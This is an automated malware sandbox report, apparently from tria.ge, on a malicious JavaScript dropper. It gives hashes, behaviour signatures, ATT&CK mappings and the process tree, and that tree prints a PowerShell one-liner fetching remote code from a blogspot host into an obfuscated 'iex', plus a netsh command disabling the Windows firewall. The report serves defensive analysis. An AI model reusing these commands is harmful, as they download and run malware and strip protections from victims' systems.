Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

14101_4701...023.js

windows7-x64

7

14101_4701...023.js

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/12/2023, 20:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    14101_4701799_4544166_19-DEC-2023.js

  • Size

    75KB

  • MD5

    5adec410f9939264652439b0b577f816

  • SHA1

    bf81a4fe9d6ef714b2a159307f2d6d6dec8392bb

  • SHA256

    e442eeceddf82c688a044f671abd042075676a058075038a00e2555f418b8888

  • SHA512

    818f9682bb81cee94228c42078069f4a9e327bdfdd4b7d5b24698636b72f23fee9fb95e227e402380f4772533666da9517580507e6a5cc40da902e49c4b335b2

  • SSDEEP

    96:9pVIq5KviVtbEx5R17Lub5MHaPw2lSGS6oDFyMP:9sviW7Lub5MHaPw2lSGS6oDFyMP

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\14101_4701799_4544166_19-DEC-2023.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm hopelnew24.blogspot.com//////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 5
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2gwvu35g\2gwvu35g.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3492
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA018.tmp" "c:\Users\Admin\AppData\Local\Temp\2gwvu35g\CSCD704969FE76F42039CB95BAE6688D7.TMP"
          4⤵
            PID:2996
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:880
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1232
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3224
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 784
            4⤵
            • Drops file in Windows directory
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:3520
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:232
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:856

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\2gwvu35g\2gwvu35g.dll
      Filesize

      3KB

      MD5

      75185c1407da679a40ac34d178658f4d

      SHA1

      03a4674c5317dc150e7df469689749ca07936a2d

      SHA256

      d23f701cf5293ee47a09f489ba5bbd76885ac80f56d0926fed26ba6fed8b0323

      SHA512

      804888666c448fb63403d4ffcd306b019d79f6aacee6e52aa75dffefc0776daabd529c8ff2eec5fbb305f6868ca4c41130a3bfeb1008ddf38af7747e7e8dd8cd

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\RESA018.tmp
      Filesize

      1KB

      MD5

      22fc345ddbcaefe887980f2be5bc0996

      SHA1

      72bdf27378e8d5a868f2a09239729eff973944b6

      SHA256

      2ae2113167f78c8c4577c8c20e01e463fbf7f9c9ae38d05d6282013dcd0d4764

      SHA512

      734a212906117e8947fb769bf13efbc0372da9265b457cf9e9b6fb8c276d99ab82c46506eb9310d4bf5cf5dee737f0a8056a885d42601d1ae3de15ab5e83f4f6

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmfomfs3.oxw.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\2gwvu35g\2gwvu35g.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\2gwvu35g\2gwvu35g.cmdline
      Filesize

      369B

      MD5

      d8b264f37c1033b69427a54fbdf3b077

      SHA1

      ce555fa039a66eb7bdf197f45466d3c4bfaa011c

      SHA256

      a7c7b669d4c3d3a448c8518ad7b9c26aea9b68f7d4d7af40682a44a434936d8d

      SHA512

      9c5341c9a2a72a4b0a835921c77301d8e6f073c28a278637b09eb1217788f7d2a4063250bc68586ba4f4d012fc1fb1c93b037fb9e273eba8cb33c5cbf71afa7a

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\2gwvu35g\CSCD704969FE76F42039CB95BAE6688D7.TMP
      Filesize

      652B

      MD5

      564a25cf678a8a03f86b2e39e4f1fe0a

      SHA1

      a8fc688224be3d425bc4a927cf9d2ac1beee8572

      SHA256

      efb4bc282b137289f2a251b133bbe661326ea9c40d78246321306ded24b5a547

      SHA512

      8bfe729a1f954eb226aa1498084e78aae128bd69db26257615c64f201e30784c0378549f9bcd8d0bcdd3a7f68d46caf02dfd90e5042ab6f7296d90b674c5c76f

      Download Submit

    • memory/232-50-0x0000000001310000-0x0000000001320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/232-51-0x0000000070E00000-0x00000000713B1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/232-66-0x0000000070E00000-0x00000000713B1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/232-49-0x0000000070E00000-0x00000000713B1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/1232-40-0x00000000058A0000-0x00000000058B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1232-37-0x0000000001200000-0x00000000012C6000-memory.dmp

      Filesize

      792KB

      Download

    • memory/1232-74-0x0000000007050000-0x000000000705A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1232-70-0x0000000074C20000-0x00000000753D0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1232-69-0x00000000070F0000-0x000000000718C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1232-43-0x0000000005900000-0x0000000005950000-memory.dmp

      Filesize

      320KB

      Download

    • memory/1232-42-0x00000000059F0000-0x0000000005A56000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1232-39-0x0000000005E20000-0x00000000063C4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1232-41-0x0000000005950000-0x00000000059E2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1232-36-0x0000000000400000-0x00000000004C6000-memory.dmp

      Filesize

      792KB

      Download

    • memory/1232-38-0x0000000074C20000-0x00000000753D0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1836-35-0x0000018CBF1A0000-0x0000018CBF1BA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1836-33-0x0000018CD7310000-0x0000018CD7320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-14-0x0000018CD9D00000-0x0000018CD9EC2000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/1836-28-0x0000018CD95E0000-0x0000018CD95E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/1836-0-0x0000018CD9590000-0x0000018CD95B2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1836-12-0x0000018CD7310000-0x0000018CD7320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-10-0x00007FFD9DBD0000-0x00007FFD9E691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1836-73-0x00007FFD9DBD0000-0x00007FFD9E691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1836-30-0x00007FFD9DBD0000-0x00007FFD9E691000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1836-34-0x0000018CBF160000-0x0000018CBF16E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/1836-11-0x0000018CD7310000-0x0000018CD7320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-32-0x0000018CD7310000-0x0000018CD7320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-13-0x0000018CD7310000-0x0000018CD7320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-31-0x0000018CD7310000-0x0000018CD7320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1836-68-0x0000018CD7310000-0x0000018CD7320000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3224-67-0x0000000070E00000-0x00000000713B1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3224-47-0x0000000070E00000-0x00000000713B1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3224-45-0x0000000070E00000-0x00000000713B1000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3224-46-0x0000000000CF0000-0x0000000000D00000-memory.dmp

      Filesize

      64KB

      Download